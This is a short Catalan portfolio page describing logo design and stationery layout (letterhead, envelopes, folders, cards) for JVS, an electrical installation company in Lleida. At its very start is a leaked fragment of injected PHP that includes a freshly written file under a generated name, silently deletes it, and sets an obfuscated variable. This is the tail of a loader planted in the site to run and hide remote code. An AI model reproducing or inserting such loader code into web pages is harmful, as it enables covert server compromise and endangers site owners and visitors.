");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Disseny de logo i maquetació d'aplicacions gràfiques: paper de carta, sobres, carpetes i targetes

JVS - Imatge corporativa

Disseny del logo de l'empresa d'Instal·lacions elèctriques de Lleida JVS. Maquetació de les aplicacions: paper de carta, sobres, carpetes i targetes.